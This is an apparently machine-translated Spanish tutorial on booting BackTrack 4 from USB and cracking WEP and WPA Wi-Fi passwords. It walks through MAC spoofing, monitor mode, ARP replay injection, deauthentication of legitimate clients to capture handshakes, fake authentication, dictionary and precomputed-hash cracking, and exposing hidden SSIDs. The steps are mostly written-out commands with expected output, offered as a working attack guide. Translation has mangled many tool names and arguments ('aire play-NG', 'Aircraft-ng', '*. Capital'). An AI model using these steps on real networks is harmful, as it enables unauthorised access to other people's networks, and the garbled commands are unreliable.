Disco Bt4 roto
Hablemos primero de los pasos específicos:
1. Preparación: (Hay 3 softwares disponibles para descargar al final del artículo y el archivo ISO se puede descargar por separado)
1, bt4- pre-final.iso (imagen del sistema)
2.grub4dos (software)
3.archivo de arranque dos (3 archivos, comando , io.sys, msdos.sys)
4. HPUSBFW (herramienta de formateo de HP)
2 Pasos de producción:
1. el método de inicio de DOS para escribir en la unidad flash USB;
2. Extraiga grldr, Grub.exe y menu.lst de grub4dos y cópielos en el directorio raíz de la unidad flash USB. /p>
3. Copie BT4.iso Copie las carpetas boot y casper en el disco U al directorio raíz del disco U
4. del disco U con menu.lst en el directorio boot\grub
3. Prueba:
1. inicie primero, luego guarde y reinicie
2. Win 98 parpadeará al principio La interfaz de inicio y luego ingrese DOS
3. luego presione Enter para ingresar al modo de inicio de grub;
4. Elija lo que desee de acuerdo con las indicaciones y el modo de necesidades personales;
5. nombre de usuario: root, contraseña: toor;
6. El comando para ingresar a la interfaz gráfica es startx.
Vale, todos los procesos están claros. ¡Comencemos nuestro propio viaje BT4!
Adjuntos se encuentran los enlaces de descarga para los tres programas anteriores:
grub4dos
Archivo de arranque de DOS (debido a que es un archivo de sistema, debe eliminar el " objeto oculto" en los atributos de la carpeta. Marque la casilla frente a "Archivos de sistema protegidos" para que se puedan mostrar todos los archivos).
HP_USB_Disk Storage Formatter_V2.0.6.rar
WEP Tutorial de Crack BT4 Crack Responda preguntas en detalle.
WEP Crack] El tutorial de craqueo BT4 proporciona respuestas detalladas a quienes pagan. Es gratuito para que todos lo vean y desprecian el cobro.
Grabación de temas pagos, el precio es de 3 yuanes por pieza. Descargue la versión en CD BT4VM y la máquina virtual, e inicie BT4 virtualmente. La versión VM de BT4 puede integrar una tarjeta de red, pero tiene mejor soporte para tarjetas de red USB.
2. Inicie BT4, seleccione el modo consola, nombre de usuario root, contraseña toor
Además: Solución al problema de pantalla negra cuando se inicia BT4
Ingrese root toor, inicie sesión en el sistema, ingrese fixvesa y luego startx. Si eso no funciona, ingrese fixvmware y luego iniciex. Si eso aún no funciona, ingrese Xorg -configure y luego startx.
Mi portátil es un Samsung R458. Al iniciar BT4 y startx, mantenga presionada la barra espaciadora para ingresar.
Después de ingresar el nombre de usuario root y la contraseña, ingrese xconf. En este momento, la pantalla estará en negro por un tiempo, luego saldrá del mensaje e ingresará startx para ingresar.
Ventana Win; cuando realmente no puede ingresar a la ventana Win, también puede ingresar directamente el comando de craqueo cuando se le solicite y abrirlo con alt+f1.
Para un shell, alt+f2 abre el segundo shell, alt+f3 abre el tercer shell, y así sucesivamente. Cierre la ventana usando la tecla Imprimir pantalla.
-end-
[]opcional
& lt& gtecho
y/o
( )Consejo
- WEP -
Shell 1: -
1.ifconfig -a
& ltwlan0...xx:xx :xx :xx:xx:xx:xx & gt;
[
Cambiador MAC-m 00:11:22:33:44:55 WLAN 0
<Modifique la dirección MAC de su tarjeta de red. Cuando la otra parte ha configurado el filtrado de direcciones MAC o para facilitar entradas futuras>;
]
2.ifconfig -a wlan0 o superior
(Puede ¿Necesita cargar la tarjeta de red compatible con inyección?)
3.airmon-ng inicia el modo de monitoreo habilitado en wlan0 6
& ltmon0>;
(6 es el canal )
Por otro lado, 5100 debería admitir airmon-ng start wlan0 para inyección.
si se hace eco aquí
[
airplay-ng -9 mon0 / airplay-ng -test-mon0
& lt Inyectar válido /usuarios no válidos>(Ataque de inyección exitoso/fallido)
(Compruebe si su tarjeta de red admite inyección)
]
4. c 6 mon 0/WLAN 0
(pack es el nombre del archivo guardado de ivs obtenidos aleatoriamente.)
Por otro lado, use airodump-ng-IVS -wpack- c6mon 0/WLAN 0.
Shell 2: -
En primer lugar, están los clientes:
Crack: cuatro formas de abcd
Cliente legítimo. generación Una gran cantidad de datos válidos puede obtener directamente una gran cantidad de límites.
Después de recibir más de 10.000 datos, transfiéralo directamente al shell 3 para descifrar la contraseña.
B. Los clientes legítimos solo pueden generar una pequeña cantidad de datos, por lo que se requiere inyección
5.aire play-NG-3-b 00000000000(APMAC)-h 1111111165438.
<Leer 11542 paquetes<Obtener 12587 ARP...>, Enviar 71524 paquetes...muchas líneas similares>;
C. El cliente legítimo no tiene comunicación, el modo de inyección no tuvo éxito.
Utilice el modo de conflicto -0 para desconectar por la fuerza el cliente legítimo y el AP, y luego volver a conectarse.
Los datos del protocolo de enlace generados por la nueva conexión permiten a -3 obtener un ARP válido y completar la inyección de ARP.
5.aire play-NG-3-b 00000000000(APMAC)-h 1111111165438.
6.aire play-NG-0 10-a 000000000(APMAC)-c 1111111165438.
(Es posible que deba abrir otra ventana)
D. Hay un cliente y el cliente puede generar datos arp válidos.
Ingrese modprobe–riwl 3945.
(Cargar tarjeta de red)
Ingrese modprobe ipwraw.
Ingresa airmon-ng start wlan0 6
Ahora, solo ingresa un comando:
Ingresa wesside-ng-iwlan 0-v 01:02:03 : 04:05:06
& ltkey:12:34:56:78:90 & gt;
Segundo, no hay clientes:
5. -ng-1 0-a 00000000000(APmac)-h 111111111111111(Mymac)mon 0
(Lo logré)
Por otro lado, usando aire play-ng- 10- y kingnet-a(apmac)-h(mymac)mon 0/WLAN 0.
& ltAutenticación exitosa& gt
& ltAssociation exitosa& gt
(Establecer conexión de enmascaramiento virtual)
Si falla, puede intentar reducir la velocidad baje la tarjeta de red y vuelva a intentarlo: iwconfig mon0 rate 2M (tenga en cuenta las letras mayúsculas).
Crack: cuatro métodos de abcd
modo crack a.-2:
Una vez establecida la conexión virtual, utilice directamente el modo de ataque interactivo -2 para recopilar datos Captura de paquetes, extracción de datos y ataques de entrega de paquetes.
6. airplay-ng-2-p 0841-c ffffffffffff-b(AP MAC)-h(my MAC)WLAN 0
Después de firmar correctamente, puede obtener suficiente iv. Y luego use craqueo por aire para craquear.
b.-3 modos de craqueo-
6. airplay-ng-3-b(AP MAC)-h(MY MAC)mon 0
7 . Crack
3. Abra Spoonwep2, puede encontrar la tarjeta de red, seleccione wlan0 para ingresar a la búsqueda, pero no se puede encontrar nada en este momento.
Cierra Spoonwep2 y reinicia Spoonwep2.
En este momento, hay un mon0 en la entrada de la tarjeta de red. Seleccione mon0, controlador normal, modo víctima desconocida y ataque de repetición PO841. Haga clic en Inicio y espere la contraseña.
Codifícalo (el paquete sata cuesta unos 30.000).
(Nota: los expertos en el foro dijeron que Spoonwep2 admite el cracking por inyección de tarjetas de red 5100AGN)
-Fin-
Seguro contra daños por agua
1. ifconfig -a
& ltwlan0...xx:xx:xx:xx:xx:xx:xx & gt;
2.ifconfig -a wlan0 o superior p>
3.airmon-ng inicia el modo de monitoreo habilitado en wlan0 6
& ltmon0 >;
(6 es el canal)
4 . airodump-ng -w 12345-c 6 mon 0/WLAN 0
(Guardar como 12345.cap)
(-w: escribir archivo, -c: interceptar canal cap)
5. airplay-ng-0 10-a(AP MAC)mon 0/WLAN 0
O ingresa: air play-ng-0 10-a(AP MAC)- c(terminal de cliente legítimo mac) mon0/wlan0 (wlan0 puede estar equivocado).
& lt18: 56: 20 Envía 64 Deauth direccionales,... algunas líneas similares>;
(dirección MAC del cliente inalámbrico legítimo seguida de -c)
(Fuerza al AP a volver a establecer un protocolo de enlace con el cliente legítimo conectado para su verificación)
(Después de varios ataques, puede intentar descifrar. El descifrado de WPA no necesita esperar hasta que los datos alcancen decenas de miles .
Porque solo necesita contener el paquete de verificación del protocolo de enlace WPA)
Craqueo del paquete Cap:
A. aircrack- ng -x -f 2 12345*. hat
El otro es usar plane-ng-z-b (AP MAC) 12345 *. Capital
B. Diccionario Crack
6 . aircrack-ng-w contraseña . hat
El otro es usar Aircraft-ng-wpassword .txt-b(AP MAC)12345 *. Capital
(
-w: es el modo de descifrado del diccionario.
Password.txt es el diccionario que preparó de antemano.
Consejo: puede utilizar la herramienta de diccionario descargada para crear un diccionario en Windows y luego copiarlo a /root en BackTrack3 (el directorio de trabajo predeterminado es aircrack)
se encuentra en /root).
Tenga en cuenta que el tiempo para descifrar una contraseña WPA depende de la dificultad de la contraseña, la inclusión del diccionario, la memoria y la CPU. Unas horas como máximo.
)
C. Copie el paquete CAP y use WIN Aircrack para descifrarlo en WIN.
Iniciar win avión, general -) tipo de cifrado -) wpa-PSK, capturar archivo -) 12345-01.cap
Wpa -) archivo diccionario -) pswd.txt, hacer clic El botón del avión en la esquina inferior derecha. ...
& lt¡Se encontró la llave! [xxxxxxxx]>;
D. Cracking de hash
6.genpmk-fdictionary .txt-d d-link . p>(Los pasos operativos de la versión de Windows son exactamente los mismos que los de Linux).
(
Explicación de parámetros:
-f Siga aquí Diccionario
El nombre del archivo de tabla generado por -d
-sesid del AP objetivo
)
7.cowpatty - d D-LINK.hash -r *. cap -s biela tipo D
(
Explicación del parámetro:
-d importa el nombre de archivo de la tabla hash WPA PMK, como dlink en la figura siguiente: Birth.hash
-r Paquetes de protocolo de enlace WPA precapturados
-sesid del AP de destino
)
-Fin-
Craqueo de WPA, ¿cómo se sabe que se ha interceptado un paquete de protocolo de enlace?
Hay un mensaje en la esquina superior derecha de la ventana de monitoreo de airodump-ng:
...Tiempo de protocolo de enlace WPA: 00:90:4c:8e:00:65
¿Dónde se guarda el archivo cap después de que BT4 toma el paquete?
Puedes verlo escribiendo ls, que está en la raíz de forma predeterminada.
¿Cómo conseguir un mac legal?
Windows puede utilizar herramientas como OmniPeek, Wireshark, Ethereal, Aircrack-ng para Windows para interceptar la MAC del cliente y Linux está disponible.
Kismet, airodump en Aircrack, etc. Cabe señalar que si la red de destino utiliza cifrado WEP o WPA, a veces es necesario descifrar los datos primero y luego cifrarlos.
La MAC del cliente solo se puede ver después de que se haya descifrado el paquete.
El primer caparazón al frente es el siguiente. Si se muestra una estación, bb: bb: bb: bb: bb es un cliente mac legal.
Estación BSSID...
aa:aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb:bb
¿Cómo encontrar SSID oculto?
1. Abra un shell en BT4 e ingrese
Puerto de tarjeta de red Airodump-ng
2. air play-ng-0 10-A Puerto de tarjeta de red MAC AP 'cliente legítimo MAC-C'.
Este comando puede causar un error debido a un error del canal, por lo que debes ingresarlo varias veces (si no funciona, significa que no es un cliente legal, prueba con otro cliente) hasta que te indique éxito.
3. Luego podrás ver el SSID que se muestra en el último shell.